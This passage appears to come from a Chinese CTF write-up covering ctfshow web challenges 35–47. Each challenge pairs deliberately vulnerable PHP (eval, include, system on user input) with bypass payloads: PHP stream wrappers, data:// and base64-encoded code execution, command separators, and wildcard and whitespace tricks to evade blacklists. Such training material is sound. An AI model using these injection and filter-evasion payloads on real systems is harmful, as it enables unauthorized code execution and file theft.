class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-5"><a href="#一-分析代码：-5" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-10131021.png"></p>
<p>过滤规则由上所示</p>
<h2 id="二-解题思路"><a href="#二-解题思路" class="headerlink" title="二.解题思路"></a>二.解题思路</h2><h3 id="方法一：-5"><a href="#方法一：-5" class="headerlink" title="方法一："></a>方法一：</h3><p>同上：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include$_GET[url]?&gt;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<h3 id="方法二：-4"><a href="#方法二：-4" class="headerlink" title="方法二："></a>方法二：</h3><p>使用input伪协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include$_GET[url]?&gt;&amp;url=php://input </span><br></pre></td></tr></table></figure>

<p>post部分：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php system(&quot;more flag.php&quot;); ?&gt;</span><br></pre></td></tr></table></figure>



<h1 id="web-36"><a href="#web-36" class="headerlink" title="web 36"></a>web 36</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;|\`|echo|\;|\(|\:|\&quot;|\&lt;|\=|\/|[0-9]/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-6"><a href="#一-分析代码：-6" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-10132143.png"></p>
<p>对如上进行了过滤</p>
<h2 id="二-解题思路：-4"><a href="#二-解题思路：-4" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-6"><a href="#方法一：-6" class="headerlink" title="方法一："></a>方法一：</h3><p>同上：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include$_GET[url]?&gt;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<h3 id="方法二：-5"><a href="#方法二：-5" class="headerlink" title="方法二："></a>方法二：</h3><p>使用input伪协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include$_GET[url]?&gt;&amp;url=php://input </span><br></pre></td></tr></table></figure>

<p>post部分：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php system(&quot;more flag.php&quot;); ?&gt;</span><br></pre></td></tr></table></figure>



<h1 id="web-37"><a href="#web-37" class="headerlink" title="web 37"></a>web 37</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">if(isset($_GET[&#x27;c&#x27;]))&#123;</span><br><span class="line">    $c = $_GET[&#x27;c&#x27;];</span><br><span class="line">    if(!preg_match(&quot;/flag/i&quot;, $c))&#123;</span><br><span class="line">        include($c);</span><br><span class="line">        echo $flag;</span><br><span class="line">    </span><br><span class="line">    &#125;</span><br><span class="line">        </span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码-1"><a href="#一-分析代码-1" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-10133426.png"></p>
<p>过滤了如上的代码</p>
<p>文件包含</p>
<h2 id="二-解题思路：-5"><a href="#二-解题思路：-5" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>使用伪协议读flag。</p>
<p><code> data://，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行</code></p>
<h3 id="方法一：-7"><a href="#方法一：-7" class="headerlink" title="方法一："></a>方法一：</h3><p>flag使用*绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?c=data://text/plain,&lt;?php echo system(&#x27;cat fl*&#x27;);?&gt;</span><br><span class="line">?c=data://text/plain,&lt;?php%20 system(&#x27;cat fl*&#x27;);?&gt;</span><br></pre></td></tr></table></figure>

<p>查看源码即可得到flag</p>
<h3 id="方法二：-6"><a href="#方法二：-6" class="headerlink" title="方法二："></a>方法二：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==</span><br></pre></td></tr></table></figure>

<p>base64解码为<code>&lt;?php system(&#39;cat flag.php&#39;);?&gt;</code><br> 查看源码即可得到flag</p>
<h3 id="方法三：-2"><a href="#方法三：-2" class="headerlink" title="方法三："></a>方法三：</h3><p>使用input伪协议进行读取</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=php://input</span><br></pre></td></tr></table></figure>

<p>post部分：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php system(&quot;more flag.php&quot;); ?&gt;</span><br></pre></td></tr></table></figure>



<h1 id="web-38"><a href="#web-38" class="headerlink" title="web 38"></a>web 38</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">//flag in flag.php</span><br><span class="line">error_reporting(0);</span><br><span class="line">if(isset($_GET[&#x27;c&#x27;]))&#123;</span><br><span class="line">    $c = $_GET[&#x27;c&#x27;];</span><br><span class="line">    if(!preg_match(&quot;/flag|php|file/i&quot;, $c))&#123;</span><br><span class="line">        include($c);</span><br><span class="line">        echo $flag;</span><br><span class="line">    </span><br><span class="line">    &#125;</span><br><span class="line">        </span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-7"><a href="#一-分析代码：-7" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-10134722.png"></p>
<p>对以上进行了过滤</p>
<h2 id="二-解题思路：-6"><a href="#二-解题思路：-6" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一"><a href="#方法一" class="headerlink" title="方法一:"></a>方法一:</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==</span><br></pre></td></tr></table></figure>

<h3 id="方法二：-7"><a href="#方法二：-7" class="headerlink" title="方法二："></a>方法二：</h3><p>使用input伪协议进行读取</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=php://input</span><br></pre></td></tr></table></figure>

<p>post部分：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php system(&quot;more flag.php&quot;); ?&gt;</span><br></pre></td></tr></table></figure>

<h1 id="web-39"><a href="#web-39" class="headerlink" title="web 39"></a>web 39</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//flag in flag.php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$c</span>.<span class="string">&quot;.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">        </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-8"><a href="#一-分析代码：-8" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p>对flag进行了过滤，在进行包含的时候会加上php的后缀</p>
<h2 id="二-解题思路：-7"><a href="#二-解题思路：-7" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>我们可以试试伪协议，因为不能带有flag，所以filter协议和php://input也不好用了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了，所以后面的.php会被当成html页面直接显示在页面上，起不到什么 作用<br>flag使用*绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?c=data://text/plain,&lt;?php echo system(&#x27;cat fl*&#x27;);?&gt;</span><br><span class="line">?c=data://text/plain,&lt;?php%20 system(&#x27;cat fl*&#x27;);?&gt;</span><br></pre></td></tr></table></figure>

<p>查看源码即可得到flag<br> 这样就相当于执行了php语句<code>&lt;?php system(&#39;cat f*&#39;)?&gt;.php</code></p>
<h1 id="web-40"><a href="#web-40" class="headerlink" title="web 40"></a>web 40</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\=|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\/|\?|\\\\/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">        </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-9"><a href="#一-分析代码：-9" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-11150938.png"></p>
<p>对以上进行了过滤。正则中的括号不是英文的 是过滤了中文的括号。</p>
<h2 id="二-解题思路：-8"><a href="#二-解题思路：-8" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/242482.html">无参数读文件和RCE总结</a></p>
<p><strong>涉及的知识点：</strong><br> 读文件+数组改造</p>
<pre><code>localeconv()：返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
pos()：返回数组中的当前元素的值。
array_reverse()：数组逆序 scandir()：获取目录下的文件
next()：函数将内部指针指向数组中的下一个元素，并输出。 首先通过
pos(localeconv())得到点号，因为scandir(’.’)表示得到当前目录下的文件，所以scandir(pos(localeconv()))就能得到flag.php了。具体内容如下
</code></pre>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-11152648.png"></p>
<p>我们的目标非常的明确，只需要将数组逆序然后将指针移动到下一个元素即可。</p>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-11153136.png"></p>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-11153307.png"></p>
<p>可以使用</p>
<p><code> show_source(),readfile、highlight_file、file_get_contents</code>(readfile和file_get_contents读文件，显示在源码处)</p>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-11154433.png"></p>
<h1 id="web-41"><a href="#web-41" class="headerlink" title="web 41"></a>web 41</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\&#123;|\&#125;|\&amp;|\-/i&#x27;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="string">&quot;echo(<span class="subst">$c</span>);&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-10"><a href="#一-分析代码：-10" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-11154804.png"></p>
<p>对以上进行了过滤。</p>
<h2 id="二-解题思路：-9"><a href="#二-解题思路：-9" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p><a target="_blank" rel="noopener" href="https://wp.ctf.show/d/137-ctfshow-web-web41">羽大佬的wp</a></p>
<h1 id="web-42"><a href="#web-42" class="headerlink" title="web 42"></a>web 42</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-11"><a href="#一-分析代码：-11" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><strong>&gt;/dev/null 2&gt;&amp;1</strong>主要意思是不进行回显的意思，可参考<a target="_blank" rel="noopener" href="https://www.cnblogs.com/tinywan/p/6025468.html">Shell脚本———— /dev/null 2&gt;&amp;1详解</a></p>
<h2 id="二-解题思路：-10"><a href="#二-解题思路：-10" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>我们的目的是让命令回显，那么进行命令分隔即可。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">; //分号</span><br><span class="line">| //只执行后面那条命令</span><br><span class="line">|| //只执行前面那条命令</span><br><span class="line">&amp; //两条命令都会执行</span><br><span class="line">&amp;&amp; //两条命令都会执行</span><br></pre></td></tr></table></figure>

<p>可构造playload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat flag.php;</span><br><span class="line">cat flag.php||</span><br></pre></td></tr></table></figure>



<h1 id="web-43"><a href="#web-43" class="headerlink" title="web 43"></a>web 43</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-12"><a href="#一-分析代码：-12" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-12204901.png"></p>
<p>代码对以上进行了过滤。</p>
<h2 id="二-解题思路：-11"><a href="#二-解题思路：-11" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>同上，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">?c=more flag.php||</span><br><span class="line">?c=sort flag.php||</span><br><span class="line">?c=less flag.php||</span><br><span class="line">?c=tac flag.php||</span><br><span class="line">?c=tail flag.php||</span><br><span class="line">?c=nl flag.php||</span><br><span class="line">?c=strings flag.php||</span><br></pre></td></tr></table></figure>

<p>等都可以进行绕过。</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/NPFS/p/13279815.html">命令执行绕过小技巧</a></p>
<h1 id="web-44"><a href="#web-44" class="headerlink" title="web 44"></a>web 44</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/;|cat|flag/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-13"><a href="#一-分析代码：-13" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-12205258.png"></p>
<p>对以上进行了过滤。</p>
<h2 id="二-解题思路：-12"><a href="#二-解题思路：-12" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>使用通配符进行绕过即可。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?c=more fl&#x27;&#x27;ag.php||</span><br><span class="line">?c=more fla*.php||</span><br><span class="line">?c=more ????.???||</span><br></pre></td></tr></table></figure>



<h1 id="web-45"><a href="#web-45" class="headerlink" title="web 45"></a>web 45</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| /i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>





<h2 id="一-分析代码：-14"><a href="#一-分析代码：-14" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p>​                                                                                <img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-12205730.png">  </p>
<p>对以上加一个空格进行了过滤</p>
<h2 id="二-解题思路：-13"><a href="#二-解题思路：-13" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>空格绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">`%09`(需要php环境)</span><br><span class="line">`$&#123;IFS&#125;`</span><br><span class="line">`$IFS$9`</span><br><span class="line">`&#123;cat,flag.php&#125;` //用逗号实现了空格功能</span><br><span class="line">`%20`</span><br><span class="line"> %09</span><br><span class="line"> &lt;&gt;</span><br><span class="line"> &lt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=more%09fla*.php||</span><br></pre></td></tr></table></figure>



<h1 id="web-46"><a href="#web-46" class="headerlink" title="web 46"></a>web 46</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| |[0-9]|\\$|\*/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-15"><a href="#一-分析代码：-15" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-12211936.png"></p>
<p>对以上进行了过滤</p>
<h2 id="二-解题思路：-14"><a href="#二-解题思路：-14" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>将空格过滤与通配符过滤结合一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=more%09????.???||</span><br></pre></td></tr></table></figure>



<h1 id="web-47"><a href="#web-47" class="headerlink" title="web 47"></a>web 47</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span 